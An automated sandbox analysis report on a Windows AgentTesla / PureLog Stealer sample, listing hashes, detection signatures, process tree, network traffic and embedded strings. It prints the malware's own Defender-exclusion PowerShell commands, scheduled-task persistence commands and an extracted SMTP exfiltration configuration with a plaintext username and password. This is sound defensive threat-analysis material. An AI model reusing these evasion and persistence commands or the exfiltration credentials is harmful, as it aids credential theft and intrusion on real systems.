Windows Analysis Report
kAsh3nmsgs.exe

Overview

General Information

Sample name: kAsh3nmsgs.exe (renamed because original name is a hash value)
Original sample name: df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca.exe
Analysis ID: 1589087
MD5: 71dbd91c836c0b016174ca9e0a2b848a
SHA1: 4417ebcd2635eb4f5d66707a2e2bb5440d058c5c
SHA256: df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca
Tags: AgentTesla, exe, user-adrian__luca

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • kAsh3nmsgs.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\kAsh3nmsgs.exe" MD5: 71DBD91C836C0B016174CA9E0A2B848A)
    • powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7584 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7260 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kAsh3nmsgs.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\kAsh3nmsgs.exe" MD5: 71DBD91C836C0B016174CA9E0A2B848A)
  • HHhSyZN.exe (PID: 7512 cmdline: C:\Users\user\AppData\Roaming\HHhSyZN.exe MD5: 71DBD91C836C0B016174CA9E0A2B848A)
    • schtasks.exe (PID: 7780 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HHhSyZN.exe (PID: 7836 cmdline: "C:\Users\user\AppData\Roaming\HHhSyZN.exe" MD5: 71DBD91C836C0B016174CA9E0A2B848A)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}
Source | Rule | Description | Author
00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
0.2.kAsh3nmsgs.exe.47324e8.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.kAsh3nmsgs.exe.47324e8.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.kAsh3nmsgs.exe.7e10000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.kAsh3nmsgs.exe.7e10000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
8.2.kAsh3nmsgs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", ProcessId: 2692, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HHhSyZN.exe, ParentImage: C:\Users\user\AppData\Roaming\HHhSyZN.exe, ParentProcessId: 7512, ParentProcessName: HHhSyZN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp", ProcessId: 7780, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\kAsh3nmsgs.exe, Initiated: true, ProcessId: 7412, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", ProcessId: 7260, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe", ProcessId: 2692, ProcessName: powershell.exe

Persistence and Installation Behavior

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kAsh3nmsgs.exe", ParentImage: C:\Users\user\Desktop\kAsh3nmsgs.exe, ParentProcessId: 1216, ParentProcessName: kAsh3nmsgs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp", ProcessId: 7260, ProcessName: schtasks.exe
                      No Suricata rule has matched

AV Detection

Source: kAsh3nmsgs.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe, Avira: detection malicious, Label: HEUR/AGEN.1305452
Source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "wizzy@transmedmaritime.cf", "Password": "!feanyi#@12"}
Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe, ReversingLabs: Detection: 79%
Source: kAsh3nmsgs.exe, ReversingLabs: Detection: 79%
Source: kAsh3nmsgs.exe, Virustotal: Detection: 61%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe, Joe Sandbox ML: detected
Source: kAsh3nmsgs.exe, Joe Sandbox ML: detected
Source: kAsh3nmsgs.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: kAsh3nmsgs.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\kAsh3nmsgs.exe, Code function: 4x nop then jmp 0F180114h 0_2_0F180123
Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe, Code function: 4x nop then jmp 0B2DEC54h 9_2_0B2DEC70
Source: global traffic, TCP traffic: 192.168.2.4:49734 -> 77.88.21.158:587
Source: Joe Sandbox View, IP Address: 77.88.21.158
Source: Joe Sandbox View, IP Address: 104.26.13.205
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: smtp.yandex.com
HHhSyZN.exe, 0000000D.00000002.4187909040.0000000009423000.00000004.00000020.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4167554620.0000000006A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003494000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003415000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003384000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000003161000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.yandex.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1734143569.0000000009512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4146034790.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4146027823.0000000000434000.00000040.00000400.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 00000009.00000002.1771700675.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, HHhSyZN.exe, 0000000D.00000002.4150523967.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: HHhSyZN.exe, 0000000D.00000002.4188194749.0000000009443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/r
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4188725792.0000000008A7C000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B54000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4188990103.0000000008A94000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148636839.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189046055.0000000008AA4000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4147231136.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.000000000315E000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4189921949.0000000008ADA000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4168514999.000000000647B000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190577674.0000000008B33000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4190331509.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 
00000008.00000002.4150670140.000000000303C000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4150670140.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknown; Network traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49737 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\kAsh3nmsgs.exe
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\HHhSyZN.exe
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe; Window created: window name: CLIPBRDWNDCLASS

                      System Summary

                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4c1f8f8.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 0.2.kAsh3nmsgs.exe.4afe9e8.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: 9.2.HHhSyZN.exe.4be4ed8.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers; Author: ditekSHen
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exe; Process Stats: CPU usage > 49%
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730005072.0000000003254000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1724628810.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1733831709.0000000007E10000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004AC4000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730005072.0000000002F19000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004719000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1730748161.0000000004752000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000000.1679143670.0000000000B2C000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenametkXU.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000000.00000002.1736515413.000000000B640000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4146027823.000000000043C000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4146758846.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameUNKNOWN_FILET vs kAsh3nmsgs.exe
                      Source: kAsh3nmsgs.exe; Binary or memory string: OriginalFilenametkXU.exe4 vs kAsh3nmsgs.exe
